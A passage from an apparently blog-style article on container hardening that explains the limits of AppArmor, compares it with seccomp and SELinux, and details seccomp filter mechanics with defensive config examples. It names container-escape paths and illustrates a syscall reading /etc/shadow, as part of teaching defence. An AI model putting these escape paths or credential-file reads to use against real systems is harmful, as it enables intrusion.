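&lt;p&gt;From there it's one step to counting denials per profile before flipping complain mode to enforce.&lt;/p&gt;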







&lt;h2&gt;
  
  
  What AppArmor Won't Stop
&lt;/h2&gt;

&lt;p&gt;This is the section most blog posts skip.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;AppArmor Coverage vs. Threat Severity

  HIGH  │ ✗ Kernel CVE bypass          ║ ✓ Cgroup release_agent escape  
        │ ✗ In-memory / ROP chain      ║ ✓ Write to /sys or /proc/kernel 
S       │ ✗ Network exfiltration       ║ ✓ Service account token read    
E       │ ✗ Misloaded profile (silent) ║ ✓ Read /proc/*/maps (recon)     
V       │ ✗ Path traversal/bind mount  ║                                  
E  ─────┼──────────────────────────────╫────────────────────────────────
R       │                              ║                                  
I       │      (no threats here —      ║ ✓ Raw socket creation            
T       │       low severity threats   ║                                  
Y       │       not covered by AA      ║                                  
        │       are acceptable risk)   ║                                  
  LOW   │                              ║                                  
        └──────────────────────────────╨────────────────────────────────
                LOW COVERAGE                   HIGH COVERAGE
                              ◄── AppArmor Coverage ──►

  ✗ = AppArmor does NOT cover this threat (needs other controls)
  ✓ = AppArmor blocks this (if profile is correctly written)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Network exfiltration&lt;/strong&gt;: AppArmor can allow or deny protocol families (TCP, UDP, raw) but has no concept of destination IPs or domains. A process with &lt;code&gt;network inet tcp&lt;/code&gt; allowed can exfiltrate data to any external endpoint. That's NetworkPolicy's domain — and the two must work together.&lt;/p&gt;
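
&lt;p&gt;A sketch of the NetworkPolicy half of that pairing — the names, labels, and CIDR here are illustrative assumptions:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: nginx-egress-allowlist
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: nginx
  policyTypes: ["Egress"]
  egress:
  - to:
    - ipBlock:
        cidr: 10.0.20.0/24       # upstream service subnet (illustrative)
    ports:
    - protocol: TCP
      port: 8443
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;AppArmor constrains &lt;em&gt;which protocol families&lt;/em&gt; the process may use; the policy above constrains &lt;em&gt;where&lt;/em&gt; permitted traffic may go.&lt;/p&gt;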

&lt;p&gt;&lt;strong&gt;In-memory attacks&lt;/strong&gt;: AppArmor is path-based and capability-based. It has no visibility into what happens in memory. A process with permitted capabilities can still execute &lt;a href="https://en.wikipedia.org/wiki/Heap_spraying" rel="noopener noreferrer"&gt;heap sprays&lt;/a&gt;, &lt;a href="https://en.wikipedia.org/wiki/Return-oriented_programming" rel="noopener noreferrer"&gt;ROP&lt;/a&gt; chains, or in-process exploitation. Runtime detection tools like &lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt; or &lt;a href="https://tetragon.io/" rel="noopener noreferrer"&gt;Tetragon&lt;/a&gt; — which observe syscall patterns using eBPF — are the right layer for this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Kernel vulnerabilities&lt;/strong&gt;: AppArmor is a kernel module that hooks via LSM interfaces. An exploit that compromises the kernel below those hooks bypasses AppArmor entirely. &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0185" rel="noopener noreferrer"&gt;CVE-2022-0185&lt;/a&gt; (a kernel heap overflow enabling container escape) is a real example — no AppArmor profile would have stopped it because the exploit occurred before LSM enforcement points were reached.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Misloaded profiles&lt;/strong&gt;: Depending on your runtime version and Kubernetes version, a missing &lt;code&gt;Localhost&lt;/code&gt; profile may either cause pod admission failure or allow the container to start without confinement. This variance is precisely why profile lifecycle management must be automated — the SPO's status reporting makes this observable; bare annotation approaches fail silently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Path-based bypasses&lt;/strong&gt;: As described above — bind mounts and mount namespace manipulation can cause policy to evaluate against a path that resolves to an unintended inode.&lt;/p&gt;





&lt;h2&gt;
  
  
  AppArmor vs. Seccomp vs. SELinux: An Opinionated Take
&lt;/h2&gt;

&lt;p&gt;These three are frequently described as interchangeable. They're not — they enforce different things at different kernel hook points.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuochbu7auzgfdtr5x6cs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuochbu7auzgfdtr5x6cs.png" alt="image" width="800" height="308"&gt;&lt;/a&gt;&lt;/p&gt;


&lt;h3&gt;
  
  
  Choosing AppArmor vs. SELinux at Platform Level
&lt;/h3&gt;

&lt;p&gt;Most platform teams don't choose between AppArmor and SELinux for purely technical reasons. They choose based on &lt;strong&gt;node OS standardization&lt;/strong&gt; — which is already determined before the security conversation happens.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Node OS&lt;/th&gt;
&lt;th&gt;MAC default&lt;/th&gt;
&lt;th&gt;Practical choice&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Ubuntu / Debian&lt;/td&gt;
&lt;td&gt;AppArmor&lt;/td&gt;
&lt;td&gt;Use AppArmor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RHEL / CentOS / OpenShift&lt;/td&gt;
&lt;td&gt;SELinux&lt;/td&gt;
&lt;td&gt;Use SELinux&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heterogeneous (both)&lt;/td&gt;
&lt;td&gt;Neither by default&lt;/td&gt;
&lt;td&gt;Pick one, standardize&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The operational cost of running both MAC engines across heterogeneous nodes — maintaining separate toolchains, policy languages, expertise, and audit pipelines — almost always outweighs any technical benefit. In practice, consistency of tooling and policy management matters more than the underlying MAC engine.&lt;/p&gt;


&lt;h3&gt;
  
  
  Control Failure Mode Comparison
&lt;/h3&gt;

&lt;p&gt;This is the table most comparison posts omit: not what each control &lt;em&gt;does&lt;/em&gt;, but what each control &lt;em&gt;fails to stop&lt;/em&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Seccomp&lt;/th&gt;
&lt;th&gt;AppArmor&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Block &lt;code&gt;mount()&lt;/code&gt; entirely&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Seccomp can block the syscall number; AppArmor mediates objects, not syscall invocation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restrict &lt;code&gt;/etc/passwd&lt;/code&gt; reads&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;Seccomp can't dereference path arguments; AppArmor is path-aware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stop kernel exploit (pre-LSM)&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Both operate inside the kernel; pre-hook exploits bypass both&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stop &lt;code&gt;open()&lt;/code&gt; misuse on allowed fd&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;Seccomp allows &lt;code&gt;open()&lt;/code&gt; broadly; AppArmor restricts what it can open&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block namespace-creating &lt;code&gt;clone()&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Argument filtering on &lt;code&gt;clone&lt;/code&gt; flags; AppArmor doesn't intercept syscall invocation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prevent network exfiltration&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;⚠️ Partial&lt;/td&gt;
&lt;td&gt;Seccomp can't; AppArmor can block protocol families but not destinations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Detect in-memory exploits&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Neither has memory visibility; needs Falco/Tetragon&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The table makes one thing clear: these two controls have almost no overlap in what they stop. They're not alternatives — they're complements covering different axes of the attack surface.&lt;/p&gt;


&lt;h3&gt;
  
  
  When Is seccomp Alone Enough?
&lt;/h3&gt;

&lt;p&gt;Seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; blocks syscalls that are rarely needed and frequently abused — &lt;code&gt;keyctl&lt;/code&gt;, &lt;code&gt;kexec_load&lt;/code&gt;, &lt;code&gt;ptrace&lt;/code&gt;, &lt;code&gt;mount&lt;/code&gt;, &lt;code&gt;unshare&lt;/code&gt;, and others. For many workloads, this provides the most impactful risk reduction per unit of operational effort.&lt;/p&gt;
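
&lt;p&gt;Enabling it is one stanza in the pod spec (shown at pod scope; individual containers can override it):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;apiVersion: v1
kind: Pod
metadata:
  name: internal-tool             # illustrative name
spec:
  securityContext:
    seccompProfile:
      type: RuntimeDefault        # every container inherits the runtime's default filter
  containers:
  - name: app
    image: internal-tool:1.4      # illustrative image
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;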

&lt;p&gt;Add AppArmor when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You need path-level access control (restrict reads to specific filesystem subtrees)&lt;/li&gt;
&lt;li&gt;You're running multi-tenant workloads and need isolation between namespace tenants&lt;/li&gt;
&lt;li&gt;You need explicit capability access control beyond what the Pod &lt;code&gt;securityContext&lt;/code&gt; expresses&lt;/li&gt;
&lt;li&gt;You're building toward a compliance posture that requires &lt;a href="https://hoop.dev/blog/understanding-mandatory-access-control-mac-in-security-posture/" rel="noopener noreferrer"&gt;MAC&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Stay with seccomp-only when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your nodes are heterogeneous (mixed OS) and profile management would span both engines&lt;/li&gt;
&lt;li&gt;Your workloads are internal tooling with low breach impact&lt;/li&gt;
&lt;li&gt;The operational cost of profile lifecycle management exceeds your team's capacity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The right answer is not "AppArmor everywhere" — it's "AppArmor where the containment value exceeds the operational cost."&lt;/p&gt;


&lt;h3&gt;
  
  
  LSM Stacking: The Frontier
&lt;/h3&gt;

&lt;p&gt;Modern Linux kernels support a degree of &lt;strong&gt;&lt;a href="https://lwn.net/Articles/804906/" rel="noopener noreferrer"&gt;LSM stacking&lt;/a&gt;&lt;/strong&gt;: BPF-LSM (5.7+) and Landlock (5.13+) can run alongside a major module like AppArmor or SELinux, each enforcing at its respective hooks. Stacking two major modules together — AppArmor &lt;em&gt;and&lt;/em&gt; SELinux in the same kernel — is still not supported in mainline, and the exact combinations available depend on kernel configuration and distribution defaults. In hardened environments where stacking is supported, this enables layered MAC enforcement that goes well beyond any single module.&lt;/p&gt;

&lt;p&gt;Tetragon takes this further: where AppArmor is a static policy engine evaluated at access time, Tetragon uses eBPF to enforce dynamic policy based on runtime context — process ancestry, argument values, network connection state — things AppArmor cannot express. If you're running Tetragon, AppArmor and eBPF enforcement are complementary, not competing.&lt;/p&gt;

&lt;p&gt;The practical answer for most clusters: &lt;strong&gt;seccomp everywhere&lt;/strong&gt; as a syscall filter, &lt;strong&gt;AppArmor on Ubuntu/Debian nodes&lt;/strong&gt; for filesystem and capability restrictions, and &lt;strong&gt;SELinux on RHEL-based nodes&lt;/strong&gt;. On kernel 5.7+, investigate &lt;a href="https://lwn.net/Articles/1042625/" rel="noopener noreferrer"&gt;BPF-LSM&lt;/a&gt; for workloads that need dynamic policy.&lt;/p&gt;





&lt;h2&gt;
  
  
  Seccomp: Deeper Than You Think
&lt;/h2&gt;

&lt;p&gt;The comparison section above treats seccomp as a peer of AppArmor. It is — but most engineers engage with it far more shallowly than with AppArmor, because the documentation stops at "configure RuntimeDefault and move on." Here's what staff-level seccomp understanding looks like.&lt;/p&gt;


&lt;h3&gt;
  
  
  The cBPF Filter Model
&lt;/h3&gt;

&lt;p&gt;Seccomp filters are &lt;strong&gt;&lt;a href="https://docs.kernel.org/bpf/classic_vs_extended.html" rel="noopener noreferrer"&gt;classic BPF (cBPF) programs&lt;/a&gt;&lt;/strong&gt;, not eBPF. This distinction matters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filters are compiled into a set of instructions evaluated in kernel context on every syscall entry&lt;/li&gt;
&lt;li&gt;Execution is intentionally constrained: no loops, bounded instruction count, no memory allocation&lt;/li&gt;
&lt;li&gt;This constraint is a feature — it guarantees the filter cannot hang or crash the kernel&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Unlike &lt;a href="https://ebpf.io/" rel="noopener noreferrer"&gt;eBPF&lt;/a&gt; observability tools (Falco, Tetragon) which can maintain maps, call helper functions, and do complex processing, a seccomp filter is a simple decision function: given this syscall number and these argument values, return an action. That simplicity is why seccomp is evaluated &lt;em&gt;first&lt;/em&gt; — before any LSM hook, before capability checks, before kernel logic runs at all.&lt;/p&gt;

&lt;p&gt;The filter is attached per-process (inheritable by children) and evaluated on every syscall entry. Attaching a filter requires &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; or the &lt;code&gt;no_new_privs&lt;/code&gt; bit to be set — which is why &lt;code&gt;allowPrivilegeEscalation: false&lt;/code&gt; is a prerequisite to meaningful seccomp enforcement.&lt;/p&gt;
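
&lt;p&gt;The attach semantics are easy to demonstrate from userspace. A Linux-only Python sketch using strict mode — the oldest, simplest seccomp mode — to show a filter killing its process on the first disallowed syscall; constant values come from &lt;code&gt;linux/prctl.h&lt;/code&gt; and &lt;code&gt;linux/seccomp.h&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import ctypes, os, signal

libc = ctypes.CDLL(None, use_errno=True)
PR_SET_NO_NEW_PRIVS = 38   # prctl option: irrevocably forbid privilege gain
PR_SET_SECCOMP = 22        # prctl option: install a seccomp mode/filter
SECCOMP_MODE_STRICT = 1    # only read/write/_exit/sigreturn survive

pid = os.fork()
if pid == 0:
    # child: set no_new_privs first (required for unprivileged filter
    # attach; harmless for strict mode), then enter strict seccomp mode
    libc.prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
    libc.prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT, 0, 0, 0)
    os.open("/etc/hostname", os.O_RDONLY)   # openat() is not on the list: SIGKILL
    os._exit(0)                             # never reached

status = os.waitpid(pid, 0)[1]
print(os.WIFSIGNALED(status) and os.WTERMSIG(status) == signal.SIGKILL)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;The parent observes the child killed by &lt;code&gt;SIGKILL&lt;/code&gt; — and note there is no way for the child to remove the filter once attached.&lt;/p&gt;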


&lt;h3&gt;
  
  
  Return Actions (More Than Allow/Deny)
&lt;/h3&gt;

&lt;p&gt;RuntimeDefault uses &lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt; for blocked syscalls. But seccomp has a richer action set that custom profiles can leverage:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Behavior&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ALLOW&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Syscall proceeds&lt;/td&gt;
&lt;td&gt;Normal operation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Returns configurable errno&lt;/td&gt;
&lt;td&gt;Default for RuntimeDefault; graceful failure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_KILL_PROCESS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Immediately kills the process&lt;/td&gt;
&lt;td&gt;Highest-risk syscalls (&lt;code&gt;ptrace&lt;/code&gt;, &lt;code&gt;kexec_load&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_LOG&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Logs the syscall, allows it&lt;/td&gt;
&lt;td&gt;Audit mode — building a profile from production traffic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_TRACE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Notifies a ptrace tracer&lt;/td&gt;
&lt;td&gt;Policy development tooling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sends event to userspace supervisor via fd&lt;/td&gt;
&lt;td&gt;See below&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most powerful and least-known action is &lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt; (introduced in kernel 5.0). It sends the syscall event to a userspace supervisor via a file descriptor — the container's syscall is paused until the supervisor makes a decision. This turns seccomp into a programmable enforcement point: a policy engine can inspect the syscall's arguments, look up process context, consult external state, and then approve or deny — all before the kernel executes anything. This is how tools like &lt;code&gt;sysbox&lt;/code&gt; implement OCI-compliant syscall interception without full &lt;a href="https://gvisor.dev/" rel="noopener noreferrer"&gt;gVisor&lt;/a&gt; overhead.&lt;/p&gt;

&lt;p&gt;For most Kubernetes workloads you'll never need &lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt;, but understanding it exists clarifies what seccomp &lt;em&gt;is&lt;/em&gt;: not just a static blocklist, but a kernel-userspace interception interface with real programmability.&lt;/p&gt;


&lt;h3&gt;
  
  
  Argument Filtering: The Underused Power Feature
&lt;/h3&gt;

&lt;p&gt;Most engineers know seccomp filters on syscall &lt;em&gt;numbers&lt;/em&gt;. Fewer know it can filter on syscall &lt;em&gt;arguments&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Seccomp's cBPF instructions can inspect the syscall argument registers. With &lt;code&gt;SCMP_CMP_MASKED_EQ&lt;/code&gt;, &lt;code&gt;value&lt;/code&gt; is treated as a bitmask and &lt;code&gt;valueTwo&lt;/code&gt; (0 when omitted) as the datum to compare against — so the rule below allows &lt;code&gt;clone()&lt;/code&gt; only when none of the masked flags are set:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"syscalls"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"clone"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ALLOW"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"index"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;2114060288&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"op"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_CMP_MASKED_EQ"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Concretely, argument filtering enables:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Allow &lt;code&gt;open()&lt;/code&gt; for read-only, deny write&lt;/strong&gt;: check the flags argument for &lt;code&gt;O_RDWR&lt;/code&gt; or &lt;code&gt;O_WRONLY&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Block &lt;code&gt;clone()&lt;/code&gt; with namespace-creating flags&lt;/strong&gt;: the RuntimeDefault profile already does this — it doesn't block &lt;code&gt;clone&lt;/code&gt; entirely (threads need it), it blocks the &lt;code&gt;CLONE_NEWUSER&lt;/code&gt; / &lt;code&gt;CLONE_NEWNS&lt;/code&gt; flag combinations that enable container escapes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Restrict &lt;code&gt;prctl()&lt;/code&gt; operations&lt;/strong&gt;: allow &lt;code&gt;PR_SET_NAME&lt;/code&gt; (used by many runtimes), block &lt;code&gt;PR_SET_DUMPABLE&lt;/code&gt; and &lt;code&gt;PR_CAP_AMBIENT&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Argument filtering is how RuntimeDefault blocks namespace-creating &lt;code&gt;clone()&lt;/code&gt; without breaking thread creation in multithreaded applications — a subtlety that gets lost in "seccomp blocks 44 syscalls" summaries.&lt;/p&gt;
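
&lt;p&gt;The masked-equality check is simple enough to verify by hand. A minimal sketch of the rule's semantics, using the flag constants from &lt;code&gt;linux/sched.h&lt;/code&gt; (note the mask equals the &lt;code&gt;2114060288&lt;/code&gt; value in the JSON above):&lt;/p&gt;

```python
# Sketch of SCMP_CMP_MASKED_EQ semantics for the runtime default's clone()
# rule: allow the call only when no namespace-creating flags are set.
# Flag values from linux/sched.h.
CLONE_NEWNS     = 0x00020000
CLONE_NEWCGROUP = 0x02000000
CLONE_NEWUTS    = 0x04000000
CLONE_NEWIPC    = 0x08000000
CLONE_NEWUSER   = 0x10000000
CLONE_NEWPID    = 0x20000000
CLONE_NEWNET    = 0x40000000

NS_MASK = (CLONE_NEWNS | CLONE_NEWCGROUP | CLONE_NEWUTS | CLONE_NEWIPC
           | CLONE_NEWUSER | CLONE_NEWPID | CLONE_NEWNET)

def clone_allowed(flags):
    # MASKED_EQ with value=NS_MASK, valueTwo=0: the rule matches (and the
    # call is allowed) only when every masked bit is zero.
    return (flags & NS_MASK) == 0

CLONE_VM, CLONE_THREAD = 0x00000100, 0x00010000
print(NS_MASK)                                 # 2114060288
print(clone_allowed(CLONE_VM | CLONE_THREAD))  # True: plain thread creation
print(clone_allowed(CLONE_NEWUSER))            # False: namespace escape path
```

&lt;p&gt;Bits outside the mask are never inspected, which is exactly why ordinary &lt;code&gt;CLONE_VM | CLONE_THREAD&lt;/code&gt; thread creation passes untouched.&lt;/p&gt;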

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Two Non-Obvious Properties
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Seccomp filters are per-thread, not per-container.&lt;/strong&gt; The filter is attached to a process and inherited by threads and child processes. In multithreaded applications, each thread runs under the same filter — but thread-specific behavior (signal handling, JVM internal threads, async runtimes) can produce syscall patterns that weren't covered during profile generation. JVM profiling windows that only observed the main application thread frequently miss the GC thread's &lt;code&gt;madvise&lt;/code&gt; and &lt;code&gt;mmap&lt;/code&gt; patterns.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seccomp is not namespace-aware.&lt;/strong&gt; The filter applies equally regardless of which container, namespace, or cgroup the thread belongs to. A seccomp filter attached to a process doesn't know it's running inside a container. This is both a strength (it can't be bypassed by namespace tricks) and a limitation (you can't express "allow &lt;code&gt;mount()&lt;/code&gt; inside the container's mount namespace but deny it in the host namespace" — that distinction lives in the capability and LSM layers, not seccomp).&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What Seccomp Won't Stop
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Seccomp has no concept of paths.&lt;/strong&gt; It sees &lt;code&gt;openat(AT_FDCWD, "/etc/shadow", O_RDONLY)&lt;/code&gt; as just another permitted &lt;code&gt;openat&lt;/code&gt; syscall. The path argument is a memory pointer, not an inline value, and cBPF cannot dereference pointers, so the filter can never inspect it. Seccomp fundamentally cannot enforce path-level access control. That's AppArmor's domain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seccomp cannot enforce stateful policies.&lt;/strong&gt; Each syscall decision is independent. Seccomp cannot say "allow the first &lt;code&gt;open()&lt;/code&gt; to this fd but deny the third" or "allow &lt;code&gt;connect()&lt;/code&gt; unless the previous &lt;code&gt;execve()&lt;/code&gt; was suspicious." For stateful, context-aware enforcement, you need eBPF-based tools (Tetragon) or &lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt; with a userspace supervisor.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seccomp cannot prevent allowed syscall abuse.&lt;/strong&gt; If &lt;code&gt;write()&lt;/code&gt; is allowed and an attacker has an open fd to a sensitive file, seccomp won't stop the write. Allowing a syscall means allowing it — what it operates on is AppArmor's responsibility.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Argument filtering has coverage limits.&lt;/strong&gt; Pointer arguments (file paths, struct pointers) cannot be dereferenced by cBPF. Only integer-valued arguments (flags, fd numbers, mode values) can be reliably checked.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Seccomp answers "&lt;em&gt;can this syscall be invoked?&lt;/em&gt;" but not "&lt;em&gt;what does this syscall operate on?&lt;/em&gt;"&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  A Threat Scenario: Container Escape Attempt
&lt;/h2&gt;

&lt;p&gt;Let's make this concrete. An attacker has achieved code execution inside a container via a deserialization vulnerability. What happens?&lt;/p&gt;

